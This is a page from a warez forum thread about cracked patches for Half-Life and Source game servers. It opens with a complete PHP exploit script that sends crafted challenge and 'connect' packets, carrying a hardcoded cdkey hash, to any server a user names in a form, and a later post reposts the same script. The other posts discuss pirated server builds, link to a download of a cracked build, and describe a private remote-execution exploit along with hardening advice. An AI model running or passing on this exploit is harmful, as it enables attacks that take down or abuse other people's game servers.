CS.RIN.RU - Steam Underground Community :: View topic - [DL] Patches for Dedicated/Listen Servers

Code: Select all | Line number On/Off | Expand/Contract

<?php

   ini_set("display_errors","0");

   function HELLO_PACKET()
   {
   $packet = pack("H*","FFFFFFFF");
   $packet .= "TSource Engine Query";
   $packet .= pack("H*","00");
   return $packet;
   }

   function CHALLENGE_PACKET()
   {
   $packet = pack("H*","FFFFFFFF");
   $packet .= "getchallenge valve";
   $packet .= pack("H*","00");
   return $packet;
   }

   function LOGIN_PACKET_4()
   {
   global $cookie;
   global $password;
   $packet = pack("H*","FFFFFFFF");
   $packet .= "connect 47 ";
   $packet .= $cookie.' "';
   $packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
   $packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
   $packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
   $packet .= 'word\'.$password;
   $packet .= pack("H*","220A0000EE02");
   return $packet;
   }

   function LOGIN_PACKET_2()
   {
   global $cookie;
   global $password;
   $packet = pack("H*","FFFFFFFF");
   $packet .= "connect 47 ";
   $packet .= $cookie.' "';
   $packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
   $packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
   $packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
   $packet .= 'word\'.$password;
   $packet .= pack("H*","22");
   return $packet;
   }

   function dowork($host,$port,$password,$auth)
   {
   global $password;
   global $cookie;
   # connecting to target host
   $fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
   if (!$fsock) die ($errstr);
   else
   {
   # sending hello packet
   fwrite ($fsock,HELLO_PACKET());
   fread ($fsock,100);
   # sending chalennge packet
   fwrite ($fsock,CHALLENGE_PACKET());
   # recieving cookies
   $resp = fread($fsock,100);
   # grab cookies from packet
   $cookie = substr($resp,strpos($resp,"A00000000")+10);
   $cookie = substr($cookie,0,strpos($cookie," "));
   # sending login packet
   if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());
   $resp = fread($fsock,100);
   }
   }

   IF (isset($_POST['host']) && isset($_POST['port']))
   {
   IF (empty($_POST['pass'])) $password = "123";
   else $password = $_POST['pass'];
   $fserver = $_POST['host'];
   $fport = $_POST['port'];
   if (isset($_POST['auth'])) $fauth = true;else $fauth=false;
   # we have to connect 2 times
   $result = dowork($fserver,$fport,$password,$fauth);
   $result = dowork($fserver,$fport,$password,$fauth);
   # parsing result
   echo "Exploit Sent";
   }
   ?>

Author:	vityan666 [ Friday, 23 May 2008, 22:45 ]
Post subject:
[Res] Ive thought about making separate thread for that but im not sure This one is about all solutions and if ill make a new one it will just disappear in dozens of other threads...

Author:	RessourectoR [ Friday, 23 May 2008, 23:44 ]
Post subject:
ok, then be sure to arrange the first post good

Author:	crp [ Saturday, 24 May 2008, 16:01 ]
Post subject:
I dont underestand vityan666 whit you new steam crack you can make that all players have unic steamid and then there is possibilti to ban cheaters, even if they change their IP address?

Author:	ChrisTX [ Saturday, 24 May 2008, 20:35 ]
Post subject:
crp Yeah, but not for source 2007. This is because the client emus generate such unique ids, the server just needs to handle them. (which eSTEAMATiON can).

Author:	majawala [ Wednesday, 18 Jun 2008, 23:22 ]
Post subject:
sorry wrong thread

CS.RIN.RU - Steam Underground Community http://cs.rin.ru/forum/

[DL] Patches for Dedicated/Listen Servers :: 02.05.2008 http://cs.rin.ru/forum/viewtopic.php?f=31&t=47213	Page 28 of 32

Author:	Remy_mon_ami [ Saturday, 21 Jun 2008, 21:45 ]
Post subject:	Link dead
the link no working plz make a new one Valve HLDS Build 3651(Linux) FIXED - ZeroTech new link http://neogeo85273937.free.fr/server/Linux.Hlds.Build3651.Amxmod.Fix.By.Zerotech.(28-07-2007).rar

Author:	wesler10 [ Tuesday, 24 Jun 2008, 18:16 ]
Post subject:
how do you use Valve HL1/HL2 Engine UniPatch v1.98.20 - ViTYAN what file do i patch?!

Author:	ChrisTX [ Tuesday, 24 Jun 2008, 18:51 ]
Post subject:
wesler10 Don't use that anymore. Use eSTEAMATiON.

Author:	b00t [ Wednesday, 25 Jun 2008, 11:32 ]
Post subject:
Yeah, all the cool kids are doing it.

Author:	ChrisTX [ Wednesday, 25 Jun 2008, 13:25 ]
Post subject:
b00t wrote: Yeah, all the cool kids are doing it. No, but all those who want unique IDs and engines invulnerable against FuF exploit/Luigi's fake players exploit without HLShield etc.

Author:	vityan666 [ Friday, 27 Jun 2008, 03:18 ]
Post subject:
[ALL] Ive contacted by two ppl recently(one from here and one from csmania.ru). I trust in both of them and i have some bad news to all of you now. Both of them have VUP-ed Windows Source 2007 Servers. Both of them got hacked by some private-unknown remote-execution exploit. This is considered highest priority vulnerability. I can say in this stage(as exploit is currently private and no one execpt those malicious hackers have access to it. Ima didnt saw it even) the following stuff is possible: 1)Vulnerability in Valve System - In this case only legit players can exploit legit server and such functionality cant be written in exploit(even NonSteam doesnt support that yet). 2)Vulnerability in VUP's "Certificate length check" patching - Dont know but i cant just exclude this possibility. As no one of us has the actual expoit this cannot be checked. Anyway VUP does not include any backdoors or something(im hope Tarantulo will expalin that his hacker tried to fuck me or something while 2nd man who contacted me didnt had any message at all but restored all the data using Undelete). Im here to develop. For all ppl who now me more or less i dont support and personally hate those: 1)Cheatz developers 2)Virus/trojan developers Ill just say "Fuck them: Forall Source 2007 admins unfortunately only VUP can make their servers accept all clients currently. Ive put my time into learning steam_api/steamclient infrustructure to create Race-2 of NonSteam clients which will be similar to their predcessors(HL1/Source) in client functionality. Ill change the patching method in VUP 2.0 Beta 7 BUT im sure it will not help anyone as i think the problem is 1) i.e VUP just allows clients without auth to join the server thus allowing exploits to enter without cd-keys and legit accounts... I reccomend to all Linux/Win32 NonSteam TF2 Admins make special highly limited user on theirs servers(read for system libraries,read for server folder/files/subfolder and write to logs folder with append/create only priveleges). For Linux/BSD run your server in chroot/sendbox/jail. Thats all that i know curently. Ill chnage the patch method of this check but im almost sure that it will not help if case of the problem is 2) (If the case is 1) then nothing can help against it) P.S If the reason of problem is 2) then eST servers are NOT affected(as long as all manual steps are followed correctly).

Author:	cYCyIYoRDf [ Friday, 27 Jun 2008, 14:03 ]
Post subject:
this is the latest source exploit, but it's old, anyway it may be never used widely as the HLDS exploit Code: Select all \| Line number On/Off \| Expand/Contract <?php ini_set("display_errors","0"); function HELLO_PACKET() { $packet = pack("H","FFFFFFFF"); $packet .= "TSource Engine Query"; $packet .= pack("H","00"); return $packet; } function CHALLENGE_PACKET() { $packet = pack("H","FFFFFFFF"); $packet .= "getchallenge valve"; $packet .= pack("H","00"); return $packet; } function LOGIN_PACKET_4() { global $cookie; global $password; $packet = pack("H","FFFFFFFF"); $packet .= "connect 47 "; $packet .= $cookie.' "'; $packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "'; $packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod'; $packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\fid\0\pass'; $packet .= 'word\'.$password; $packet .= pack("H","220A0000EE02"); return $packet; } function LOGIN_PACKET_2() { global $cookie; global $password; $packet = pack("H","FFFFFFFF"); $packet .= "connect 47 "; $packet .= $cookie.' "'; $packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott'; $packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam'; $packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\fid\0\pass'; $packet .= 'word\'.$password; $packet .= pack("H","22"); return $packet; } function dowork($host,$port,$password,$auth) { global $password; global $cookie; # connecting to target host $fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2); if (!$fsock) die ($errstr); else { # sending hello packet fwrite ($fsock,HELLO_PACKET()); fread ($fsock,100); # sending chalennge packet fwrite ($fsock,CHALLENGE_PACKET()); # recieving cookies $resp = fread($fsock,100); # grab cookies from packet $cookie = substr($resp,strpos($resp,"A00000000")+10); $cookie = substr($cookie,0,strpos($cookie," ")); # sending login packet if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2()); $resp = fread($fsock,100); } } IF (isset($_POST['host']) && isset($_POST['port'])) { IF (empty($_POST['pass'])) $password = "123"; else $password = $_POST['pass']; $fserver = $_POST['host']; $fport = $_POST['port']; if (isset($_POST['auth'])) $fauth = true;else $fauth=false; # we have to connect 2 times $result = dowork($fserver,$fport,$password,$fauth); $result = dowork($fserver,$fport,$password,$fauth); # parsing result echo "Exploit Sent"; } ?>

Author:	Zippo94 [ Saturday, 28 Jun 2008, 21:57 ]
Post subject:
Nice but what crack must have for Gmod10 server? Thank you! =)

Author:	RPG [ Sunday, 29 Jun 2008, 12:28 ]
Post subject:
First of all want to thanks for great jobs done here. What I mentioned about latest patches. They all work fine but not the same. My server Win32 AMXX1.8.0 MM1.19p32 and AMXBANS v5.0 I wanted to found best patch in lately time and I chosed: Valve HL1/HL2 Engine UniPatch v1.98.20 - ViTYAN well this patch and Valve HLDS Build 3647(Win32) - REVOLUTiON don't fit my requirements. Thats of AMXBANS, like I mentioned UNIVERSAL and REVOLUTION patches creates a fake Steam ID and Amxbans ban players by this ID not by IP like before, then player is STEAM_ID_PENDING, VALVE_ID_PENDING, STEAM_ID_LAN or VALVE_ID_LAN. That was problem why chosed: Valve HLDS Build 3647(Win32) - PROViSiON it's keeps NON steam players in old method and it's fine works with AMXBANS Any way thanks all for great patches , keep in same rhythm.

Author:	jamess [ Sunday, 29 Jun 2008, 15:08 ]
Post subject:
Simply Choose Vityan solution + eST (my signature). You can assign STEAM ID to ALL player (doesnt matter which emu, client uses). Then you have latest hlds, AMXBANS will be work fine (unique steamIDs)

Page 28 of 32	All times are UTC + 3 hours
Powered by phpBB® Forum Software © phpBB Group https://www.phpbb.com/